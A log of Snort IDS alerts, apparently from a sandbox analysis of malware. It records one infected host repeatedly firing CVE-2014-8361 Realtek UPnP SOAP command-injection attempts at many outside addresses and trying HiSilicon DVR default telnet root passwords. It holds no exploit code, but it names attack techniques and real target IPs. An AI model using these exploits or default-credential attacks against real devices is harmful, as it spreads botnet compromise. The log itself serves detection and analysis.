Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55490 -> 45.33.240.207:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55490 -> 45.33.240.207:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33012
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36620 -> 91.77.162.185:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36620 -> 91.77.162.185:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36624 -> 91.77.162.185:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43688 -> 45.123.198.127:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43688 -> 45.123.198.127:52869
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:33012 -> 211.106.163.145:23
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49968 -> 45.33.243.183:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49968 -> 45.33.243.183:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41516 -> 45.43.226.236:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41516 -> 45.43.226.236:52869
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:51282 -> 212.27.0.202:23
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:57766 -> 181.192.57.218:23
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53568 -> 45.33.255.34:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53568 -> 45.33.255.34:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33012
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35390
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35390
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50284 -> 45.115.236.159:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50284 -> 45.115.236.159:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50308 -> 45.115.236.159:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 37.85.164.81:23 -> 192.168.2.23:50880
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41356 -> 91.77.238.72:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41356 -> 91.77.238.72:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41358 -> 91.77.238.72:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 125.139.34.17:23 -> 192.168.2.23:44166
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 125.139.34.17:23 -> 192.168.2.23:44166
Source: Traffic Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33152
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35384 -> 185.235.183.65:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35384 -> 185.235.183.65:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35484 -> 185.235.183.65:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55468 -> 45.84.91.165:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55468 -> 45.84.91.165:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55476 -> 45.84.91.165:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40568 -> 45.152.216.51:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40568 -> 45.152.216.51:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 212.27.0.202:23 -> 192.168.2.23:51282
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 212.27.0.202:23 -> 192.168.2.23:51282
Source: Traffic Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49550
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44976 -> 45.113.0.188:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44976 -> 45.113.0.188:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33152
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51096 -> 91.200.123.41:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48824 -> 45.127.160.101:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48824 -> 45.127.160.101:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49550
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49550
Source: Traffic Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49600
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 37.85.164.81:23 -> 192.168.2.23:50880
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 37.85.164.81:23 -> 192.168.2.23:50880
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55428 -> 185.245.0.231:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55428 -> 185.245.0.231:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45612 -> 91.78.111.19:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45612 -> 91.78.111.19:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59048 -> 45.84.90.224:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59048 -> 45.84.90.224:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45624 -> 91.78.111.19:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49600
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49600
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59060 -> 45.84.90.224:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41378 -> 45.126.229.132:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41378 -> 45.126.229.132:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33282
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35584
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35584
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60078 -> 91.77.143.236:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60078 -> 91.77.143.236:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50132 -> 185.184.220.115:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50132 -> 185.184.220.115:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49646
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54010 -> 45.133.119.139:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54010 -> 45.133.119.139:52869
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:49646 -> 182.71.126.190:23
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60082 -> 91.77.143.236:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49646
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49646
Source: Traffic Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33282
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44352 -> 91.200.121.29:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49712
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35318 -> 91.77.125.100:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35318 -> 91.77.125.100:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35322 -> 91.77.125.100:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37108 -> 45.153.166.108:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37108 -> 45.153.166.108:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37110 -> 45.153.166.108:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49712
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49712
Source: Traffic Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49752
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50044 -> 45.142.152.184:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50044 -> 45.142.152.184:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33428
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45504 -> 45.43.231.213:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45504 -> 45.43.231.213:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58168 -> 45.43.234.114:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58168 -> 45.43.234.114:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43210 -> 45.120.184.152:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43210 -> 45.120.184.152:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45512 -> 45.43.231.213:52869
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:44530 -> 125.139.34.17:23
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47226 -> 91.76.179.163:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47226 -> 91.76.179.163:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47268 -> 91.76.179.163:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43218 -> 45.120.184.152:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34880 -> 45.115.242.28:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34880 -> 45.115.242.28:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49752
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49752
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48016 -> 45.248.71.254:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48016 -> 45.248.71.254:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51472 -> 185.241.254.137:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51472 -> 185.241.254.137:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49822
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51476 -> 185.241.254.137:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42706 -> 45.84.90.111:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42706 -> 45.84.90.111:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47392 -> 185.245.0.24:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47392 -> 185.245.0.24:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42746 -> 45.84.90.111:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56442 -> 45.57.247.12:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56442 -> 45.57.247.12:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56468 -> 45.57.247.12:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33428
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35768
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35768
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49822
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49822
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54702 -> 91.200.121.128:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49852
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49852
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49852
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43050 -> 45.42.80.68:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43050 -> 45.42.80.68:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49898
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58184 -> 45.84.90.2:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58184 -> 45.84.90.2:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42416 -> 91.77.204.153:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42416 -> 91.77.204.153:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 37.85.164.81:23 -> 192.168.2.23:51292
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58196 -> 45.84.90.2:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42424 -> 91.77.204.153:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44940 -> 45.121.56.17:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44940 -> 45.121.56.17:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33552
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 125.139.34.17:23 -> 192.168.2.23:44530
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 125.139.34.17:23 -> 192.168.2.23:44530
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49898
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49898
Source: Traffic Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:49956
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54128 -> 91.214.119.203:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54128 -> 91.214.119.203:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54132 -> 91.214.119.203:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36952 -> 45.153.8.233:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36952 -> 45.153.8.233:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33552
Source: Traffic Snort IDS: 716 INFO TELNET access 46.229.140.197:23 -> 192.168.2.23:52150
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:49956
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:49956
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40856 -> 45.120.204.212:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40856 -> 45.120.204.212:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 93.88.28.185:23 -> 192.168.2.23:48888
Source: Traffic Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:50008
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48642 -> 185.245.0.128:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48642 -> 185.245.0.128:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38714 -> 45.123.196.203:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38714 -> 45.123.196.203:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50286 -> 45.115.241.200:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50286 -> 45.115.241.200:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43188 -> 45.248.69.219:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43188 -> 45.248.69.219:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 37.85.164.81:23 -> 192.168.2.23:51292
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 37.85.164.81:23 -> 192.168.2.23:51292
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:50008
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:50008
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35952
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35952
Source: Traffic Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33700
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 121.184.41.14:23 -> 192.168.2.23:46112
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 121.184.41.14:23 -> 192.168.2.23:46112
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 212.27.0.202:23 -> 192.168.2.23:51734
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 212.27.0.202:23 -> 192.168.2.23:51734
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54576 -> 185.182.49.136:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54576 -> 185.182.49.136:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60530 -> 45.195.159.188:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60530 -> 45.195.159.188:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33524 -> 45.115.237.165:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33524 -> 45.115.237.165:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33700
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47496 -> 45.33.241.232:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47496 -> 45.33.241.232:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41138 -> 45.138.69.194:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41138 -> 45.138.69.194:52869
